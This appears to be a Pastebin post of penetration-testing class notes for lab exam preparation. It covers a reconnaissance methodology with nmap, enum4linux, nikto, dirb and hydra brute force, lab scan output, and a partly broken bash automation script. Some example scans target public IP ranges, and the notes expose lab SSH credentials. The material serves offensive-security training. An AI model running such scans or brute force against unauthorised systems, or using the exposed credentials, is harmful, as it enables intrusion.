joemccray

Chris & Robert lab time

Nov 6th, 2019
2,308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
  2.  
  3.  
  4. Issue 1. Lack of a thorough attack process
  5. ==========================================
  6. - Host discovery
  7. - Service discovery
  8. - Service version discovery
  9. - Vulnerability research
  10. - Linux (port 111)/Window (port 445) Enumeration
  11. - Webserver vulnerability scan
  12. - Directory brute force every webserver
  13. - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
  14. - Brute force all services
  15.  
  16.  
  17. Issue 2. Lack of automation of the process
  18. ==========================================
  19. - Research attacks scripts on the internet to enhance your methodology
  20.  
  21.  
  22. Issue 3. Failing to document all steps being performed and their output
  23. =======================================================================
  24.  
  25.  
  26. Issue 4. Lack of sleep during the exam
  27. ======================================
  28.  
  29.  
  30. Issue 5. Failing to reboot target machines prior to attack
  31. ==========================================================
  32.  
  33.  
  34.  
  35. --------------------------------------------------------------------------------------------------------------
  36.  
  37.  
  38. A good strategy to use to prepare would be:
  39.  
  40. Step 1. Ensure that you are comfortable with Linux
  41. --------------------------------------------------
  42. - LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
  43. - Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
  44.  
  45. You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
  46. https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
  47. https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
  48. https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
  49.  
  50.  
  51.  
  52. 2. You should be comfortable with the following tools:
  53. ------------------------------------------------------
  54.  
  55. Nmap:
  56. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
  57.  
  58. Metasploit:
  59. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
  60.  
  61. Burp Suite:
  62. https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
  63.  
  64. Sqlmap:
  65. https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
  66.  
  67. Nikto:
  68. https://www.youtube.com/watch?v=GH9qn_DBzCk
  69.  
  70. Enum4Linux:
  71. https://www.youtube.com/watch?v=hA5raaGOQKQ
  72.  
  73. RPCINFO/SHOWMOUNT:
  74. https://www.youtube.com/watch?v=FlRAA-1UXWQ
  75.  
  76. Hydra:
  77. https://www.youtube.com/watch?v=rLtj8tEmGso
  78.  
  79.  
  80.  
  81. 3. You need to comfortable with basic exploit development
  82. ---------------------------------------------------------
  83.  
  84. Basic assembly:
  85. https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
  86.  
  87. Basic exploit development (first 5 videos in the playlist):
  88. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  89.  
  90.  
  91. 4. You need to be comfortable with privilege escalation
  92. -------------------------------------------------------
  93. Linux
  94. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  95.  
  96. Windows
  97. https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  98. http://www.fuzzysecurity.com/tutorials/16.html
  99.  
  100.  
  101.  
  102.  
  103. #################################
  104. ----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
  105. #################################
  106.  
  107.  
  108. ########################
  109. # Scanning Methodology #
  110. ########################
  111.  
  112. - Ping Sweep
  113. What's alive?
  114. ------------
  115.  
  116. ---------------------------Type This-----------------------------------
  117. sudo nmap -sP 157.166.226.*
  118.  
  119. -----------------------------------------------------------------------
  120.  
  121.  
  122.  
  123. -if -SP yields no results try:
  124. ---------------------------Type This-----------------------------------
  125. sudo nmap -sL 157.166.226.*
  126.  
  127. -----------------------------------------------------------------------
  128.  
  129.  
  130.  
  131. -Look for hostnames:
  132. ---------------------------Type This-----------------------------------
  133. sudo nmap -sL 157.166.226.* | grep com
  134.  
  135. -----------------------------------------------------------------------
  136.  
  137.  
  138.  
  139. - Port Scan
  140. What's where?
  141. ------------
  142. ---------------------------Type This-----------------------------------
  143. sudo nmap -sS 162.243.126.247
  144.  
  145. -----------------------------------------------------------------------
  146.  
  147.  
  148.  
  149. - Bannergrab/Version Query
  150. What versions of software are running
  151. -------------------------------------
  152.  
  153. ---------------------------Type This-----------------------------------
  154. sudo nmap -sV 162.243.126.247
  155.  
  156. -----------------------------------------------------------------------
  157.  
  158.  
  159.  
  160.  
  161. - Vulnerability Research
  162. Lookup the banner versions for public exploits
  163. ----------------------------------------------
  164. http://exploit-db.com
  165. http://securityfocus.com/bid
  166. https://packetstormsecurity.com/files/tags/exploit/
  167.  
  168.  
  169.  
  170.  
  171.  
  172. -----------------------------------------------------------------------------------------------------------------------------
  173. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  174. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  175. --------------------------------------------------------------------------------------
  176. Some tools to install:
  177. ---------------------------Type This-----------------------------------
  178. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  179. gcc propecia.c -o propecia
  180. sudo cp propecia /bin
  181. -----------------------------------------------------------------------
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189. - I prefer to use Putty to SSH into my Linux host.
  190. - You can download Putty from here:
  191. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  192.  
  193. Here is the information to put into putty
  194.  
  195.  
  196. ip address: 149.28.201.171
  197. username: labpentest
  198. password: lab!network@attack!
  199.  
  200.  
  201.  
  202. ##############################
  203. # Scanning Process to follow #
  204. ##############################
  205.  
  206. Step 1: Host Discovery
  207. ----------------------
  208.  
  209. ---------------------------Type This-----------------------------------
  210. nmap -sP 172.31.2.0/24
  211.  
  212. nmap -sL 172.31.2.0/24
  213.  
  214. nmap -sS --open -p 22,445 172.31.2.0/24
  215.  
  216. propecia 172.31.2 22 > file1
  217. propecia 172.31.2 445 > file2
  218. cat file1 file2 > file3
  219. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
  220. cat lab.txt
  221. -----------------------------------------------------------------------
  222.  
  223.  
  224. Step 2: Port Scan
  225. -----------------
  226. nmap -sS <IP-ADDRESS>
  227. nmap -sU -p 69,161 <IP-ADDRESS>
  228.  
  229.  
  230. ---------------------------Type This-----------------------------------
  231. sudo nmap -sS 172.31.2.0/24
  232. sudo nmap -sU -p 69,161 172.31.2.0/24
  233. -----------------------------------------------------------------------
  234.  
  235.  
  236. Step 3: Bannergrab
  237. ------------------
  238. nmap -sV <IP-ADDRESS>
  239. nmap -sV -p- <IP-ADDRESS>
  240. |
  241. ----> Vulnerability Research
  242.  
  243. ---------------------------Type This-----------------------------------
  244. sudo nmap -sV 172.31.2.0/24
  245. -----------------------------------------------------------------------
  246.  
  247.  
  248.  
  249.  
  250. Step 4: Enumerate common Windows/Linux file sharing services
  251. Step 3 is where most people STOP, and you need to move on and look deeper
  252. ------------------------------------------------------------
  253.  
  254. ---------------------------Type This-----------------------------------
  255. sudo apt install smbclient libnss-winbind winbind ldapscript
  256. wget https://raw.githubusercontent.com/Wh1t3Fox/polenum/master/polenum.py
  257. chmod +x polenum.py
  258. sudo cp polenum.py /bin/
  259. git clone https://github.com/portcullislabs/enum4linux.git
  260. cd enum4linux/
  261. perl enum4linux.pl -U 172.31.2.11
  262.  
  263. nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
  264. ---------------------------------------------------------------------------------------
  265.  
  266.  
  267.  
  268. Step 5: Vulnerability Scan the webservers
  269. -----------------------------------------
  270. git clone https://github.com/sullo/nikto.git Nikto2
  271.  
  272. cd Nikto2/program
  273.  
  274. perl nikto.pl -h <IP-ADDRESS>
  275.  
  276.  
  277.  
  278. Step 6: Directory Bruteforce every webserver
  279. --------------------------------------------
  280. sudo apt install -y libcurl4-openssl-dev
  281.  
  282. git clone https://github.com/v0re/dirb.git
  283.  
  284. cd dirb/
  285.  
  286. ./configure
  287.  
  288. make
  289.  
  290. ./dirb
  291.  
  292. ./dirb http://<IP-ADDRESS> wordlists/big.txt
  293.  
  294.  
  295.  
  296.  
  297.  
  298. Step 7: Analyze source code of all webpages found
  299. -------------------------------------------------
  300. lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
  301.  
  302. If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
  303.  
  304. $ wget \
  305. --recursive \
  306. --no-clobber \
  307. --page-requisites \
  308. --html-extension \
  309. --convert-links \
  310. --restrict-file-names=windows \
  311. --domains website.org \
  312. --no-parent \
  313. www.website.org/tutorials/html/
  314.  
  315.  
  316. This command downloads the Web site www.website.org/tutorials/html/.
  317.  
  318. The options are:
  319.  
  320. --recursive: download the entire Web site.
  321.  
  322. --domains website.org: don't follow links outside website.org.
  323.  
  324. --no-parent: don't follow links outside the directory tutorials/html/.
  325.  
  326. --page-requisites: get all the elements that compose the page (images, CSS and so on).
  327.  
  328. --html-extension: save files with the .html extension.
  329.  
  330. --convert-links: convert links so that they work locally, off-line.
  331.  
  332. --restrict-file-names=windows: modify filenames so that they will work in Windows as well.
  333.  
  334. --no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
  335.  
  336.  
  337.  
  338. Step 8: Bruteforce any services you find
  339. ----------------------------------------
  340. sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-devcd ~/toolz
  341. git clone https://github.com/vanhauser-thc/thc-hydra.git
  342. cd thc-hydra
  343. ./configure
  344. make
  345. hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
  346. hydra -l user -P passlist.txt ftp://<IP-ADDRESS
  347.  
  348.  
  349.  
  350. ##################
  351. # Host Discovery #
  352. ##################
  353.  
  354. Reason:
  355. -------
  356. You have to discover the reachable hosts in the network before you can attack them.
  357.  
  358.  
  359. Hosts discovery syntax:
  360. -----------------------
  361. nmap -sP 172.31.2.0/24
  362. propecia 172.31.2 22 > file1
  363. propecia 172.31.2 445 > file2
  364. cat file1 file2 > file3
  365. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
  366. cat lab.txt
  367.  
  368. Issues:
  369. -------
  370. Issue we had to deal with was hosts that didn't respond to ICMP
  371.  
  372.  
  373. Hosts discovered:
  374. -----------------
  375. 172.31.2.11
  376. 172.31.2.14
  377. 172.31.2.47
  378. 172.31.2.64
  379. 172.31.2.86
  380. 172.31.2.117
  381. 172.31.2.157
  382. 172.31.2.217
  383. 172.31.2.238
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390. #####################
  391. # Service Discovery #
  392. #####################
  393.  
  394. Reason:
  395. -------
  396. Identifying what services are running on what hosts allows for you to map the network topology.
  397.  
  398.  
  399.  
  400. Port Scan syntax:
  401. sudo nmap -sS -Pn -iL lab.txt
  402. sudo nmap -sU -p69,161 -Pn -iL lab.txt
  403.  
  404.  
  405.  
  406. Services discovered:
  407. --------------------
  408.  
  409. joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
  410.  
  411. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
  412. Nmap scan report for 172.31.2.11
  413. Host is up (0.087s latency).
  414. Not shown: 995 filtered ports
  415. PORT STATE SERVICE
  416. 21/tcp open ftp
  417. 139/tcp open netbios-ssn
  418. 445/tcp open microsoft-ds
  419. 3389/tcp open ms-wbt-server
  420. 9999/tcp open abyss
  421.  
  422. Nmap scan report for 172.31.2.11
  423. Host is up.
  424.  
  425. PORT STATE SERVICE
  426. 69/udp open|filtered tftp
  427. 161/udp open|filtered snmp
  428.  
  429.  
  430. Nmap scan report for 172.31.2.14
  431. Host is up (0.087s latency).
  432. Not shown: 995 filtered ports
  433. PORT STATE SERVICE
  434. 21/tcp open ftp
  435. 139/tcp open netbios-ssn
  436. 445/tcp open microsoft-ds
  437. 3389/tcp open ms-wbt-server
  438. 9999/tcp open abyss
  439.  
  440.  
  441. Nmap scan report for 172.31.2.14
  442. Host is up.
  443.  
  444. PORT STATE SERVICE
  445. 69/udp open|filtered tftp
  446. 161/udp open|filtered snmp
  447.  
  448.  
  449. Nmap scan report for 172.31.2.47
  450. Host is up (0.086s latency).
  451. Not shown: 998 closed ports
  452. PORT STATE SERVICE
  453. 22/tcp open ssh
  454. 80/tcp open http
  455.  
  456. Nmap scan report for 172.31.2.64
  457. Host is up (0.087s latency).
  458. Not shown: 997 closed ports
  459. PORT STATE SERVICE
  460. 22/tcp open ssh
  461. 80/tcp open http
  462. 6667/tcp open irc
  463.  
  464. Nmap scan report for 172.31.2.86
  465. Host is up (0.086s latency).
  466. Not shown: 989 closed ports
  467. PORT STATE SERVICE
  468. 22/tcp open ssh
  469. 53/tcp open domain
  470. 80/tcp open http
  471. 110/tcp open pop3
  472. 111/tcp open rpcbind
  473. 139/tcp open netbios-ssn
  474. 143/tcp open imap
  475. 445/tcp open microsoft-ds
  476. 993/tcp open imaps
  477. 995/tcp open pop3s
  478. 8080/tcp open http-proxy
  479.  
  480. Nmap scan report for 172.31.2.117
  481. Host is up (0.087s latency).
  482. Not shown: 997 closed ports
  483. PORT STATE SERVICE
  484. 22/tcp open ssh
  485. 80/tcp open http
  486. 2020/tcp open xinupageserver
  487.  
  488. Nmap scan report for 172.31.2.157
  489. Host is up (0.087s latency).
  490. Not shown: 997 closed ports
  491. PORT STATE SERVICE
  492. 21/tcp open ftp
  493. 22/tcp open ssh
  494. 80/tcp open http
  495.  
  496. Nmap scan report for 172.31.2.217
  497. Host is up (0.087s latency).
  498. Not shown: 997 closed ports
  499. PORT STATE SERVICE
  500. 22/tcp open ssh
  501. 80/tcp open http
  502. 3260/tcp open iscsi
  503.  
  504. Nmap scan report for 172.31.2.238
  505. Host is up (0.087s latency).
  506. Not shown: 997 closed ports
  507. PORT STATE SERVICE
  508. 22/tcp open ssh
  509. 80/tcp open http
  510. 6969/tcp open acmsoda
  511.  
  512. Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
  513.  
  514.  
  515.  
  516.  
  517.  
  518.  
  519.  
  520.  
  521.  
  522. ##############################################
  523. # Service Version Discovery (Bannergrabbing) #
  524. ##############################################
  525. Reason:
  526. -------
  527. Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
  528.  
  529.  
  530.  
  531. Port Scan syntax:
  532.  
  533. joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
  534.  
  535. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
  536. Nmap scan report for 172.31.2.11
  537. Host is up (0.087s latency).
  538. Not shown: 995 filtered ports
  539. PORT STATE SERVICE VERSION
  540. 21/tcp open ftp FreeFloat ftpd 1.00
  541. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  542. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  543. 3389/tcp open ms-wbt-server Microsoft Terminal Service
  544. 9999/tcp open abyss?
  545. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
  546.  
  547. Nmap scan report for 172.31.2.14
  548. Host is up (0.087s latency).
  549. Not shown: 995 filtered ports
  550. PORT STATE SERVICE VERSION
  551. 21/tcp open ftp FreeFloat ftpd 1.00
  552. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  553. 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  554. 3389/tcp open ms-wbt-server Microsoft Terminal Service
  555. 9999/tcp open abyss?
  556. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
  557.  
  558. Nmap scan report for 172.31.2.47
  559. Host is up (0.087s latency).
  560. Not shown: 998 closed ports
  561. PORT STATE SERVICE VERSION
  562. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
  563. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
  564. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  565.  
  566. Nmap scan report for 172.31.2.64
  567. Host is up (0.087s latency).
  568. Not shown: 997 closed ports
  569. PORT STATE SERVICE VERSION
  570. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  571. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  572. 6667/tcp open irc ngircd
  573. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  574.  
  575. Nmap scan report for 172.31.2.86
  576. Host is up (0.087s latency).
  577. Not shown: 989 closed ports
  578. PORT STATE SERVICE VERSION
  579. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  580. 53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
  581. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  582. 110/tcp open pop3 Dovecot pop3d
  583. 111/tcp open rpcbind 2-4 (RPC #100000)
  584. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  585. 143/tcp open imap Dovecot imapd (Ubuntu)
  586. 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  587. 993/tcp open ssl/imap Dovecot imapd (Ubuntu)
  588. 995/tcp open ssl/pop3 Dovecot pop3d
  589. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  590. Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
  591.  
  592. Nmap scan report for 172.31.2.117
  593. Host is up (0.086s latency).
  594. Not shown: 997 closed ports
  595. PORT STATE SERVICE VERSION
  596. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  597. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  598. 2020/tcp open ftp vsftpd 2.0.8 or later
  599. Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  600.  
  601. Nmap scan report for 172.31.2.157
  602. Host is up (0.086s latency).
  603. Not shown: 997 closed ports
  604. PORT STATE SERVICE VERSION
  605. 21/tcp open ftp vsftpd 2.0.8 or later
  606. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
  607. 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
  608.  
  609. Nmap scan report for 172.31.2.217
  610. Host is up (0.087s latency).
  611. Not shown: 997 closed ports
  612. PORT STATE SERVICE VERSION
  613. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  614. 80/tcp open http nginx
  615. 3260/tcp open iscsi?
  616. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  617.  
  618. Nmap scan report for 172.31.2.238
  619. Host is up (0.087s latency).
  620. Not shown: 997 closed ports
  621. PORT STATE SERVICE VERSION
  622. 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  623. 80/tcp open http nginx 1.6.2
  624. 6969/tcp open acmsoda?
  625. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  626.  
  627. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  628. Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
  629.  
  630.  
  631.  
  632.  
  633.  
  634.  
  635.  
  636. -----------------------------------------------------------------------------------------------------------------------------
  637. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  638. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  639. --------------------------------------------------------------------------------------
  640.  
  641. #!/bin/bash
  642.  
  643. # Script made during the CyberWar class for the students to play with, debug, and improve.
  644. # Take a look at the following websites for ideas:
  645. # https://github.com/commonexploits/port-scan-automation
  646. # https://www.commonexploits.com/penetration-testing-scripts/
  647. # https://github.com/averagesecurityguy/scripts
  648. # https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  649.  
  650.  
  651.  
  652. # Some thoughts of things to add to this script:
  653. # Shodan queries (API key)
  654. # AWS scanning (need credentials)
  655. # Jenkins scanning
  656. # Active Directory enumeration
  657. # Github scanning (API key required)
  658. # Blockchain platforms
  659.  
  660.  
  661.  
  662.  
  663.  
  664.  
  665.  
  666. #############################################
  667. # Check to see if script is running as root #
  668. #############################################
  669. if [ "$EUID" -ne 0 ]
  670. then echo "Please run as root"
  671. exit
  672. fi
  673.  
  674.  
  675. ####################################
  676. # Check to see if gcc is installed #
  677. ####################################
  678. file1="/usr/bin/gcc"
  679. if [ -f "$file1" ]
  680. then
  681. echo "$file is installed."
  682. clear
  683. else
  684. echo "$file not found."
  685. echo Installing gcc
  686. apt-get install -y gcc
  687. clear
  688. fi
  689.  
  690. ########################
  691. # Make the directories #
  692. ########################
  693. cd /tmp
  694. rm -rf customerAudit/
  695. rm -rf NetworkAudit/
  696. mkdir -p /tmp/NetworkAudit/discovered_services/
  697. mkdir -p /tmp/NetworkAudit/scan/windows/
  698. mkdir -p /tmp/NetworkAudit/scan/sunrpc/
  699. mkdir -p /tmp/NetworkAudit/scan/ssh/
  700. mkdir -p /tmp/NetworkAudit/scan/ftp/
  701. mkdir -p /tmp/NetworkAudit/scan/http/
  702. mkdir -p /tmp/NetworkAudit/scan/telnet/
  703. mkdir -p /tmp/NetworkAudit/scan/pop3/
  704. mkdir -p /tmp/NetworkAudit/scan/printers/
  705. mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
  706. mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
  707. mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
  708. mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
  709.  
  710.  
  711. #####################
  712. # Download propecia #
  713. #####################
  714. file2="/bin/propecia"
  715. if [ -f "$file2" ]
  716. then
  717. echo "$file is installed."
  718. clear
  719. else
  720. echo "$file not found."
  721. echo Installing propecia
  722. cd /tmp
  723. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  724. gcc propecia.c -o propecia
  725. cp propecia /bin
  726. fi
  727.  
  728. ######################
  729. # Find Windows Hosts #
  730. ######################
  731. clear
  732. echo "Scanning for windows hosts."
  733. propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
  734. clear
  735. echo "Done scanning for windows hosts. FTP is next."
  736.  
  737.  
  738. ##################
  739. # Find FTP Hosts #
  740. ##################
  741. echo "Scanning for hosts running FTP."
  742. propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
  743. clear
  744. echo "Done scanning for FTP hosts. SSH is next."
  745.  
  746. ##################
  747. # Find SSH Hosts #
  748. ##################
  749. echo "Scanning for hosts running SSH."
  750. propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
  751. clear
  752. echo "Done scanning for SSH hosts. POP3 is next."
  753.  
  754.  
  755. ###################
  756. # Find POP3 Hosts #
  757. ###################
  758. echo "Scanning for hosts running POP3."
  759. propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
  760. clear
  761. echo "Done scanning for POP3 hosts. SunRPC is next."
  762.  
  763.  
  764. #####################
  765. # Find SunRPC Hosts #
  766. #####################
  767. echo "Scanning for hosts running SunRPC."
  768. propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
  769. clear
  770. echo "Done scanning for SunRPC hosts. Telnet is next."
  771.  
  772.  
  773. #####################
  774. # Find Telnet Hosts #
  775. #####################
  776. echo "Scanning for hosts running Telnet."
  777. propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
  778. clear
  779. echo "Done scanning for Telnet hosts. HTTP is next."
  780.  
  781.  
  782. ###################
  783. # Find HTTP Hosts #
  784. ###################
  785. echo "Scanning for hosts running HTTP"
  786. propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
  787. clear
  788. echo "Done scanning for HTTP hosts. HTTPS hosts are next."
  789.  
  790.  
  791. ###################
  792. # Find HTTPS Hosts #
  793. ###################
  794. echo "Scanning for hosts running HTTP"
  795. propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
  796. clear
  797. echo "Done scanning for HTTPS hosts. Databases are next."
  798.  
  799.  
  800. ##################
  801. # Find Databases #
  802. ##################
  803. echo "Scanning for hosts running MS SQL Server"
  804. propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
  805. clear
  806.  
  807. echo "Scanning for hosts running Oracle"
  808. propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
  809. clear
  810.  
  811. echo "Scanning for hosts running Postgres"
  812. propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
  813. clear
  814.  
  815. echo "Scanning for hosts running MongoDB"
  816. propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
  817. clear
  818.  
  819. echo "Scanning for hosts running MySQL"
  820. propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
  821. clear
  822. echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
  823.  
  824.  
  825. ###############################
  826. # Ok, let's do the NMAP files #
  827. ###############################
  828. clear
  829. # Windows
  830. for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
  831. echo "Done with Windows."
  832.  
  833. clear
  834. # FTP
  835. for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
  836. echo "Done with FTP."
  837.  
  838. clear
  839. # SSH
  840. for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
  841. echo "Done with SSH."
  842.  
  843. clear
  844. # SUNRPC
  845. for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
  846. echo "Done with SunRPC."
  847.  
  848. clear
  849. # POP3
  850. for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
  851. echo "Done with POP3."
  852.  
  853. # clear
  854. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  855. # as a good reference for what nmap nse scripts to run against port 80 and 443
  856. # for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
  857. # echo "Done with HTTP."
  858.  
  859.  
  860. # clear
  861. # HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
  862. # as a good reference for what nmap nse scripts to run against port 80 and 443
  863. # for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
  864. # echo "Done with HTTP."
  865.  
  866.  
  867. clear
  868. # SQL Servers
  869. for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
  870. echo "Done with MS SQL."
  871.  
  872. clear
  873. # Oracle Servers
  874. # FIX THIS: needs brute force wordlists for this to run correctly
  875. # for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
  876. # echo "Done with Oracle."
  877.  
  878. clear
  879. # MongoDB
  880. for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
  881. echo "Done with MongoDB."
  882.  
  883.  
  884. clear
  885. # MySQL Servers
